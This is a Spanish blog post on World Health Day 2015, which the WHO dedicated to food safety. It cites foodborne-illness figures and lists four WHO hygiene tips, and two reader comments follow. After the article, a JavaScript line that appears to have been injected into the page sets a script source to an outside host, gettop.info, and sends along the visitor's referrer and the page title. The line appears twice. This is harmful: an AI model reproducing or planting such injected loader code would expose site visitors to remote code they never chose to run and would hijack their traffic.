Salud y belleza » Enfermedades, Productos peligrosos, Salud, alimentos

Día Mundial de la Salud 2015 dedicado a la inocuidad de los alimentos

2 Comentarios

Según diversos estudios, más de 2 millones de muertes al año, sobre todo de niños, están relacionadas con el consumo de alimentos insalubres que contienen bacterias, parásitos, virus o algún tipo de sustancia química nociva. Estos alimentos, además, pueden causar hasta 200 enfermedades distintas, desde una simple gastroenteritis hasta el cáncer.

inocuidad-alimentos

Este año la Organización Mundial de la Salud (OMS) dedica el Día Mundial de la Salud 2015 a la inocuidad de los alimentos, puesto que cada vez es más necesario mejorar los sistemas que garantizan la inocuidad de los alimentos en todo el mundo.

La OMS busca así fomentar medidas que consigan mejorar la inocuidad de los alimentos al pasar por la larga cadena desde la granja o los campos de cultivo hasta el plato del consumidor. Para ello, esta organización ya ofrece a los países una serie de normas y recomendaciones de prácticas para prevenir y dar respuesta a las enfermedades transmitidas por los alimentos. Estas son algunas de las recomendaciones de la OMS para garantizar la inocuidad de los alimentos:

- Mantener la limpieza.

- Separar los alimentos crudos y cocinados.

- Cocinar los alimentos completamente.

- Mantener los alimentos a la temperatura correcta.

¿Conocías la importancia de la inocuidad de los alimentos?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

2 Comments »

  • flora said:

    es verdad que muchas veces no sabemos de dónde vienen los alimentos pero tampoco les damos el cuidado que necesitan para que estén libres de todo riesgo.

  • jossua said:

    es muy importante lavar las verduras. una vez me pasé dos semanas malo por un microbio o bacteria que había en la lechuga. desde entonces limpio todo lo que puedo y más los alimentos.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.